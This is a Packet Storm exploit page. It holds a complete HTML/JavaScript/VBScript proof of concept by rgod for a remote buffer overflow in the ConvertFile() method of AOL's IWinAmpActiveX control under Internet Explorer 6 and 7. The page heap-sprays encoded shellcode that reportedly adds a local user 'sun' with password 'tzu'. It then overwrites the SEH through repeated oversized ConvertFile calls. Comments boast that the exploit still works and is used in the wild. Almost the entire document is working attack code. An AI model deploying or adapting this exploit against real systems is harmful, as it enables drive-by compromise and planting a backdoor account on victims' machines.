AOL IWinAmpActiveX Class ConvertFile() remote overflow exploit for Internet Explorer versions 6 and 7 that leverages AmpX.dll version 2.4.0.6. Old unreleased exploit from the rgod archive.
a87724d13c90191ac2aa44040cfd28b63ab9f526cdd557bc96e6c9a805782485<!--
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
by rgod
site: http://retrogod.altervista.org/
Notes by Nine:Situations:Group : an old unreleased one from rgod's archive,
*not* the same of http://www.kb.cert.org/vuls/id/568681
*not* the same of http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=623
(different clsid)
No one talks about the ConvertFile() method...
STILL FUCKING WORKSSSSS LOL!!!
AOL still serves the cab with the vulnerable control!!!
It seems to me that this is exploited in the wild:
http://www.google.com/search?q=FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6&hl=en&num=100&filter=0
details:
CLSID: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6}
Progid: WinAmpX.IWinAmpActiveX.2
Binary Path: C:\PROGRA~1\COMMON~1\Nullsoft\ActiveX\2.4\AmpX.dll
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<HTML>
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' width=1 height=1 id='IWinAmpActiveX'
codebase="http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab">
</OBJECT>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
</script>
<SCRIPT language='VBScript'>
'first block must set eax to 0xffffffff, the second one overwrites seh
bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
</SCRIPT>
</HTML>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed